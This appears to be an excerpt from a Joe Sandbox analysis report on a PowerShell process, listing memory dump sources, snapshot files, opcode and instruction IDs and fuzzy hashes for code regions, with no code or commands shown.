                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8ead3f4d5f2745923e75047f3d9bfe612250f8f1c6f454ce84f3477b4e185f90
                                                                                                                                                                  • Instruction ID: 276eaf01e58e9bc419265604ace1a8c93c5ae8783b223644ae649372c24cfb35
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ead3f4d5f2745923e75047f3d9bfe612250f8f1c6f454ce84f3477b4e185f90
                                                                                                                                                                  • Instruction Fuzzy Hash: 79410AF0A002069BCB65AF24C5017AE7BAAAF81B18F148497D9059F252DB39DC45CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f3b92ea18a133e47b4d617d0508187f393d01a5385f8002e3574044f4f7c07ef
                                                                                                                                                                  • Instruction ID: 8dbf5b0bd86feb56f0c31b8f0d0078c034fa46a94198ebfb599241ed280b8fff
                                                                                                                                                                  • Opcode Fuzzy Hash: f3b92ea18a133e47b4d617d0508187f393d01a5385f8002e3574044f4f7c07ef
                                                                                                                                                                  • Instruction Fuzzy Hash: E14136B5A006059FCB09CF59C698AAAFBB1FF48310B118599D815AB365C736FC51CFA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 97d1e635d28d540dd52b8814c244233f2deb4f52f86fd6982417b82b03904d79
                                                                                                                                                                  • Instruction ID: 10b7d10ba3f30c2e2f81ac65df7b92804c92abaae8f599e738ad4db292b7f12a
                                                                                                                                                                  • Opcode Fuzzy Hash: 97d1e635d28d540dd52b8814c244233f2deb4f52f86fd6982417b82b03904d79
                                                                                                                                                                  • Instruction Fuzzy Hash: B34132346052458FCB15CF68C5A8AADBBF1EF8A325F1940A9D845BB361DB35EC01CF60
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bbb4196b045fbac6a156845471c3691ea595a081ca3b7c557bd3b598b8a6cf87
                                                                                                                                                                  • Instruction ID: 4e04f2dd1b91b6708de02dc7b1e59eb2efe33959f827e75899cc184728361021
                                                                                                                                                                  • Opcode Fuzzy Hash: bbb4196b045fbac6a156845471c3691ea595a081ca3b7c557bd3b598b8a6cf87
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41BA31A012459FCB15CF38D584A9EBFF2FF89300F148569D406AB3A2DB30AC49CB91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 268df973e27db609395d3dfad0f8f47fa9207ff93aba485f78f86d037894d610
                                                                                                                                                                  • Instruction ID: 54c505c409ac85189a7c202e239d92990449d1530138636d6d6cd7b896167906
                                                                                                                                                                  • Opcode Fuzzy Hash: 268df973e27db609395d3dfad0f8f47fa9207ff93aba485f78f86d037894d610
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319C353002019FD705EB78E954B9ABBE6EFC8215F00853AD90ACB365DF70AC49CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 58c4725f53c607ed42fe9aad5b55146f136c9e8e9ade051eba574e1e8865bd7a
                                                                                                                                                                  • Instruction ID: 85cee41746245d23f5d64d5c54bef2b8d33bb7abe9f78bd6749220df08cef64e
                                                                                                                                                                  • Opcode Fuzzy Hash: 58c4725f53c607ed42fe9aad5b55146f136c9e8e9ade051eba574e1e8865bd7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A315470A01105DFDB04DFB9D5947AE7BF6EF89311F148069D805EB364EA34AC45CB61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 11fcee15f204dff2763ae1629774f25bf21697c7fe6e5a00939cda7764d1a925
                                                                                                                                                                  • Instruction ID: e4b4a3a93f7e647768ca9f88074ad0a8b3bb559fe64fa866fc5bc6138a43eeac
                                                                                                                                                                  • Opcode Fuzzy Hash: 11fcee15f204dff2763ae1629774f25bf21697c7fe6e5a00939cda7764d1a925
                                                                                                                                                                  • Instruction Fuzzy Hash: C131C4B4A002499FEB04DBB4D454ABEBBB2EFC5304F1184B9C905AF395CA34AC45CB51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e5d109019d62a1d66adb71c5a64b4a325a50593e5453a386309f4cac72a89937
                                                                                                                                                                  • Instruction ID: e4aef891fc107ec6bc5072364f07589319c73443f3951246e09e29d0c3600bf7
                                                                                                                                                                  • Opcode Fuzzy Hash: e5d109019d62a1d66adb71c5a64b4a325a50593e5453a386309f4cac72a89937
                                                                                                                                                                  • Instruction Fuzzy Hash: AC314170A00209DFDB04DFA9D6547AEBBF6EF89311F148029E805EB364EA34AC45CB61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 214bbbb7baae30eab50d7a41e4b21bf177d71f733539472152c89442d2601f2a
                                                                                                                                                                  • Instruction ID: 13370d23fb3f3a2d3d18ec7d8a8215644ea310a996c8f51dbc9372a6743d0be5
                                                                                                                                                                  • Opcode Fuzzy Hash: 214bbbb7baae30eab50d7a41e4b21bf177d71f733539472152c89442d2601f2a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4A313831A01205DFCB14DF69D694A9EBBF2FF88301F108529D816A7394DB34AD49CF90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 118a9e93837e8c2e1914dc171dbfe72d2c88b90c4245eeac9c20b3a53a4e2ef9
                                                                                                                                                                  • Instruction ID: 81fb88314336cf932b9616b35f76fda2e7a9ba9652066e664481c81b6496e1fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 118a9e93837e8c2e1914dc171dbfe72d2c88b90c4245eeac9c20b3a53a4e2ef9
                                                                                                                                                                  • Instruction Fuzzy Hash: CB314A71A002048FDB14DF69D458A9EBBF2EF8C314F14456AD806EB3A1DF75AC85CB90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 56bdca9fe2136acbca257e7b1cd31b56cf05d076c7f3d3d65c28f9f52121845e
                                                                                                                                                                  • Instruction ID: 1876ff64e6865e48c31a53bf365d80bf7b59d215d4d931506c8442652b179ff8
                                                                                                                                                                  • Opcode Fuzzy Hash: 56bdca9fe2136acbca257e7b1cd31b56cf05d076c7f3d3d65c28f9f52121845e
                                                                                                                                                                  • Instruction Fuzzy Hash: 25310371A002058FDB14DF69D498A9EBBF2EF8C214F148569D806EB3A1DF75AC85CB90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5e0eae1fa9354a9abf2a794dc4e30c1bf6f9cb8d80ae97f9dc75681349496d14
                                                                                                                                                                  • Instruction ID: 579326be267c998f24f8cb014852c399694aa0852081662139a6821737a1db88
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0eae1fa9354a9abf2a794dc4e30c1bf6f9cb8d80ae97f9dc75681349496d14
                                                                                                                                                                  • Instruction Fuzzy Hash: EB316DB4F002099FEB04EFA4D854ABEB7B2EFC4304F118479D915AB394DA39AD418B91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6471e19776e6ba721b820562ab8b282bfb4fa56deff030fd353d29ad30696d93
                                                                                                                                                                  • Instruction ID: b63dfc379214d0441eb6df690280fdf28d1c39d4285c5b29aa6cc7bb9ca235eb
                                                                                                                                                                  • Opcode Fuzzy Hash: 6471e19776e6ba721b820562ab8b282bfb4fa56deff030fd353d29ad30696d93
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C21C472604200DFCB05DF54EAC4B26BF66FB88314F24C5B9ED0A4A65AD336E856CB61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4ed42ba85c5b31e676e4d47efd615ab32f1a03cb34693141a540fc3914d75936
                                                                                                                                                                  • Instruction ID: c255e67b26ef70ffed7930f68c471dec0d3259c51e5a8627867cd4d826d44ec7
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ed42ba85c5b31e676e4d47efd615ab32f1a03cb34693141a540fc3914d75936
                                                                                                                                                                  • Instruction Fuzzy Hash: C5317AB4A06344CEDB60CF6AD1887CAFFF6EB88320F28C41EC84D9B215D6746480CB61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a4d6aa0c4c485d4d36f2d074273958c003ade2a60b10ba8bc669c91a93b0adf8
                                                                                                                                                                  • Instruction ID: fe1e2e49741b5db0d6ecd3fefa32cd2f84c52b1e86be3e8d46e603e218ad0038
                                                                                                                                                                  • Opcode Fuzzy Hash: a4d6aa0c4c485d4d36f2d074273958c003ade2a60b10ba8bc669c91a93b0adf8
                                                                                                                                                                  • Instruction Fuzzy Hash: 74210471604244DFCB04DF14E9C0F26BBA6EB84318F24C97DD90A4B25AC73AE446CA61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 060e89d45ec376a051667d95a8abe4b84aca1d1b398ae635054c81498d7c6769
                                                                                                                                                                  • Instruction ID: ac27bb810d9a88e066c0911f9be03cd230ec2eb1d203a4806ee1bd5f8c26eb3d
                                                                                                                                                                  • Opcode Fuzzy Hash: 060e89d45ec376a051667d95a8abe4b84aca1d1b398ae635054c81498d7c6769
                                                                                                                                                                  • Instruction Fuzzy Hash: C7214BB4905744CEDB60CF6AC18879AFBFAEF88314F28C42ED85DAB215D6746480CB61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9287f20bcaf8c80be75f2cf4106326def11feb42c0a398526ddc7fe880c71f29
                                                                                                                                                                  • Instruction ID: d0b0abed4dff5cef2f29c430c3f07e0617c5045e9b5000101391d17d5e6f8240
                                                                                                                                                                  • Opcode Fuzzy Hash: 9287f20bcaf8c80be75f2cf4106326def11feb42c0a398526ddc7fe880c71f29
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D111939700118CFCB14DBA8DA409AE77F6EBC8265B0541A9E909EB325DA35ED018BA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3b5c9787f1b4609856546fc4ef3bda28caab0b8159381e8ccc4dd3add93f98b8
                                                                                                                                                                  • Instruction ID: 04f2bd43da0a5bd115b9a8f495d2725ab7c181d1f0bef2adaf66447a2310b95c
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5c9787f1b4609856546fc4ef3bda28caab0b8159381e8ccc4dd3add93f98b8
                                                                                                                                                                  • Instruction Fuzzy Hash: B411C4F0A00206CFDBA0EF59C645BAAB7E9FF85329F048066D9088B251D372D850CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                  • Instruction ID: ec57760db25d33aabe4253d6dcd772d2d7ad454e5c5035fcd729de068cd73f79
                                                                                                                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                  • Instruction Fuzzy Hash: 41215E76504240DFDB06CF54E9C4B16BF62FB44314F24C5A9DD094A65AC336D85ACB51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: fbfc25623dd9cd13e058ca342cc9805f7ea0f125c9f182090873dd286fe97751
                                                                                                                                                                  • Instruction ID: 5bc27ba9ad398d8b19cf87b06e0cf80221775784e0f20a6b2a9ab595753013a0
                                                                                                                                                                  • Opcode Fuzzy Hash: fbfc25623dd9cd13e058ca342cc9805f7ea0f125c9f182090873dd286fe97751
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D0128357052445FC765CB78D980ABE7BF5EF8A224B0001AED40ED7221DA72AC05CB50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                  • Instruction ID: 12c9fdd0783d0493ec7f5c2efca12da109caba2dd147659ecec08b89f421e83b
                                                                                                                                                                  • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F11DD75504280CFCB02CF10E9C4B15BFA2FB84314F28C6AAD84A4B65AC33AE44ACF61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2732f1a1d1a72eb437df65af324676a02854692e44584f9720db110266aec273
                                                                                                                                                                  • Instruction ID: 34ae112a9cb296901db6de150a1bc89ae1485bbe9bd6269fdb7335c921be8bd6
                                                                                                                                                                  • Opcode Fuzzy Hash: 2732f1a1d1a72eb437df65af324676a02854692e44584f9720db110266aec273
                                                                                                                                                                  • Instruction Fuzzy Hash: 1201D6312097849FC715DB79D594A5A7FE0EF45221F1848EEE48ACB6B3CA30F885CB11
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 40c853986c971982e6b41f8e32cbd9bad737a91bf0df1a5c75de3122056a2958
                                                                                                                                                                  • Instruction ID: dc7eb2e7e03ee1b64a68d91852b8cb92f1fe3b6d538a9cc5a1f9cfde98fb3f2f
                                                                                                                                                                  • Opcode Fuzzy Hash: 40c853986c971982e6b41f8e32cbd9bad737a91bf0df1a5c75de3122056a2958
                                                                                                                                                                  • Instruction Fuzzy Hash: 04110574204750CFC768DF75D08485ABBF6EF8A31572489ADE48A8B7A0CB36F842CB50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 611048350c7c4416a3063cc14a309a864c2f95e8bfb69d18b982d0c1825f68f3
                                                                                                                                                                  • Instruction ID: 1d8d4444b1fe5c1b665c969d3a6122963058f3e41681176ec17d6226ede0a2be
                                                                                                                                                                  • Opcode Fuzzy Hash: 611048350c7c4416a3063cc14a309a864c2f95e8bfb69d18b982d0c1825f68f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 8001247270D3D08FD7055BACA8D06BABFE4EFA622170841AEF880CB266D774D904DB10
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5d0a919f117009683a4e1d645433e6ca7409335716dc176751a235327a26965f
                                                                                                                                                                  • Instruction ID: e4095563d2d989f8af1b45973b6caffa426cedc82041fda05da18e439849cc50
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d0a919f117009683a4e1d645433e6ca7409335716dc176751a235327a26965f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A018035700214CFCB119B74E848AAEBBF6FB88215F14406EE91EE3242DB319905DB91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 909c1c5823cb20a0baf2c3640ca1bbde9af94a3a42c6c7efefbb71e7190a7359
                                                                                                                                                                  • Instruction ID: 96a5688bd39fa55675e854b258298c4c9e055df0ca9c00ac5e2e5e839f6b708a
                                                                                                                                                                  • Opcode Fuzzy Hash: 909c1c5823cb20a0baf2c3640ca1bbde9af94a3a42c6c7efefbb71e7190a7359
                                                                                                                                                                  • Instruction Fuzzy Hash: E0012B31309340DEE7104E25DE84767BF9CDF41324F18C63AEC2A0B146C279E841C6B1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977514326.000000000496D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0496D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_496d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 94f1f8e4e211556b11a5abfe6dc99aa4ec3ab279dbb7f2de5844ee67178aa5bf
                                                                                                                                                                  • Instruction ID: a58114df90cc1a879d0b72be255a07708f2623042b0779cda6779ebe98d9cfc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 94f1f8e4e211556b11a5abfe6dc99aa4ec3ab279dbb7f2de5844ee67178aa5bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C015E7110E3C09ED7128B259D94B52BFB8EF43224F1DC1DBD8988F1A3C2699849C7B2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e3aff0df8b8da75ffe7d2a18a9d0766904d243c5adb358c94162e6240a9c168
                                                                                                                                                                  • Instruction ID: 5678398f8a93d68d8005081d40f2ac8da4a21ef908306d21737f3f261e5fff5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e3aff0df8b8da75ffe7d2a18a9d0766904d243c5adb358c94162e6240a9c168
                                                                                                                                                                  • Instruction Fuzzy Hash: EAF0A47130E3A01FD7059AB99C5496BBFE9EF8A26071945AFF484CB2A3D970CC04C760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 12369f482cbddcf3776bb98b298987cd8ec324cfc4e2da35f58ca90fc253f21e
                                                                                                                                                                  • Instruction ID: ae6f697699427be413b5c1a01a5eb1b53b7fc89c42d8dc1cfec3cd266a404b4e
                                                                                                                                                                  • Opcode Fuzzy Hash: 12369f482cbddcf3776bb98b298987cd8ec324cfc4e2da35f58ca90fc253f21e
                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0283620A2405FC711D769E880AAE7BF8EF8A220700066ED00EC7621CE706C45C760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8db7b3175f2e01a59ef0b3397d036eb6cf37dbfae4003a90b43f66fa8d432fe8
                                                                                                                                                                  • Instruction ID: 8c9ac1156ba9099de2d90361e66d06e7638f29f54e1773f2974ec678dc568673
                                                                                                                                                                  • Opcode Fuzzy Hash: 8db7b3175f2e01a59ef0b3397d036eb6cf37dbfae4003a90b43f66fa8d432fe8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9E01E572D0178AEFCB44CFA4C9446EEFBB1FF89300F24171AE015A6651EBB06685CB80
                                                                                                                                                                  Memory Dump Source
